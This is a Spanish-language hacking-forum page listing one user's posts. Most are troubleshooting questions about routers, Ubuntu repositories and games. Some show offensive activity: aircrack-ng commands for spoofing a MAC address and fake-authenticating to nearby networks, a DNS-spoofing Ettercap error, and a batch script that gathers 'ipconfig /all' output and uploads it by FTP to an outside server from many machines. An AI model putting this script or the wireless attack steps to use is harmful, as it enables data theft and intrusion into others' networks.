elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1]
1  Comunicaciones / Redes / Router sin modem en: 27 Enero 2011, 03:52 am
Hola.

Tengo una placa de red inalambrica por la cual tengo conexion a internet y otra placa de red comun (Cable). y quiero montar una  mini red con un router con el cual comparta conexion a Inter. ¿Se puede? ¿Como lo hago?



# Disculpen que haga esas preguntas "tontas" pero probe casi toda la tarde en conf. y nada
# El router que tengo es un Nisuta
# Gracias de antemano - y disculpen las molestias :)
2  Programación / Programación Visual Basic / Re: "Ohcan07 remote shell con keylogger"+ codigo de fuente explicado en: 25 Octubre 2010, 00:27 am
que groso el pibe :)
y lo mejor es que anda de +10 depues cuando tenga tiempo libre te acomodo algunas algunas cosillas para hacerlo ma compacto jeje
 
3  Seguridad Informática / Hacking Wireless / Re: No me puedo asociar ni inyectar :( en: 25 Octubre 2010, 00:19 am
uso ubuntu 10.10 (maverick)
4  Seguridad Informática / Hacking Wireless / No me puedo asociar ni inyectar :( en: 24 Octubre 2010, 22:45 pm
Hola
necesito ayuda, ayer se  me dio por usar el aircrack encontre miles de redes,  y cuando llegaba el momento de asociarme y inyectar ppaquetes a alguna red no podia;

seguia todos los pasos ;
 el nombre de la interfaz que uso es wlan1

wlan1      RTL8187    rtl8187 - [phy0]

airmong-ng stop wlan1
ifconfig wlan1 down
macchanger --mac 00.11:22:33:44:55 wlan1
airmong-ng start wlan1

wlan1      RTL8187    rtl8187 - [phy0]
                        (monitor mode enabled on mon0)


despues de eso me la deja en modo monitor con el nombre de mon0

airodump-ng mon0 para ver las redes
airodump-ng -c 8 -w cap --bssid 00:02:6F:33:9B:8A mon0  para fijar una,
 
y aca es donde surge el problema,  

aireplay-ng -1 0 -a 00:02:6F:33:9B:8A -h 00:11:22:33:44:55 -e zeus mon0
The interface MAC (00:C0:CA:1D:D3:90) doesn't match the specified MAC (-h).
   ifconfig mon0 hw ether 00:11:22:33:44:55
17:28:46  Waiting for beacon frame (BSSID: 00:02:6F:33:9B:8A) on channel -1
17:28:46  mon0 is on channel -1, but the AP uses channel 11

nose si es problema por la mac o por la interfaz que uso ...
que puede ser y cmo lo arreglo?

5  Media / Juegos y Consolas / Juegos Mp4? en: 17 Agosto 2010, 16:39 pm
Hola gente, alguin sabe si se pueden poner juegos a un mp4 (chic - pro) en caso de que se pueda cuales son las extensiones y donde puedo conseguir juegos para este, .


Gracias de antemano.-
6  Sistemas Operativos / GNU/Linux / Problema al actulizar en Ubuntu en: 25 Mayo 2010, 19:30 pm
Hola,
miren tengo el siguiente problema:

Modifique el archivo sources.list agregandole los repositorios del BT4, despues cuando voy a actualizar (apt-get update) me salen los sig. errores:
Código:
Dynamic MMap corrió fuera de la sala. Incremente el tamaño de APT::Cache-Limit. Valor actual: 25165824. (man 5 apt.conf)
E: Ocurrió un error mientras se procesaba liblua5.1-sql-mysql-dev (NewFileDesc2)
E: Problem with MergeList /var/lib/apt/lists/archive.offensive-security.com_dists_pwnsauce_universe_binary-i386_Packages
W: Unable to munmap
E: No se pudieron analizar o abrir las listas de paquetes o el archivo de estado.

pd.: lo que le agrege fue esto:
Código:
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe m$
deb http://archive.offensive-security.com/repotest/ ./ # BackTrack Devel Repository

¿alguna idea de como arreglar eso?
gracias de antemano.  :)
7  Seguridad Informática / Hacking / Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing] en: 3 Mayo 2010, 23:53 pm
heu, muy buena conbinacion,
 tengo el siguiente problema miren:

Código:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth1...
ERROR : 20, Not a directory
[src/ec_capture.c:src/ec_capture.c:146]

 pcap_open: Error opening adapter: El sistema no puede hallar el dispositivo especificado. (20)

como se que interfaz tengo que usar? o cual es el problema? ya probe con eth1,2,0 pero sale el mismo error

Pd: todo eso por la consola de windows .-
8  Programación / Scripting / Re: se puede o es "imposible" ? en: 12 Febrero 2010, 19:28 pm
jeje, al final era una "estupidez"

gracias.- muchusimas gracias,   :D
9  Programación / Scripting / [Solucionado]se puede o es "imposible" ? en: 12 Febrero 2010, 15:08 pm
Hola, Saludos a todos los usuarios ,

Bueno, lo que necesito hacer en este .bat


Código:
ipconfig /all>max-d.mx
echo anonymous>ftp.tmp
echo guest>>ftp.tmp
echo cd direcciones>>ftp.tmp
echo put max-d.mx>>ftp.tmp
echo disconnect>>ftp.tmp
echo bye>>ftp.tmp
ftp -s:ftp.tmp ftp.webcindario.com
del /F /Q ftp.tmp
del /F /Q max-d.mx

Es que  genere un archivo que en ves de letras sean numeros, por ej:
cuando haga el ipconfig /all lo meta en un archivo (1258.mx) y que cuando envia el achivo al ftp sea 1258.mx... me explique bien ?

que cada vez que se ejecute ese bat, envia archivos (numero.mx) distintos al Servidor ftp...


.-POr que se lo dejo como esta, cada vez que se ejecute en una maquina diferente este va a enviar el archivo max-d.mx y despues cuando se ejecute en otra maquina lo remplaza en en el servidor...

gracias de ante mano...

PD: habia pensado en el Randmon pero no se como ubicarlo...
10  Programación / Programación Visual Basic / Re: iSpread Module en: 10 Noviembre 2009, 23:34 pm
Hola, disculpen por la pregunta que les voy a hacer.-


una vez que cargo el modulo en el Vb.-ya funka, o hay que agregarle alguna/s lineas  :huh:



Gracias de antemano
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines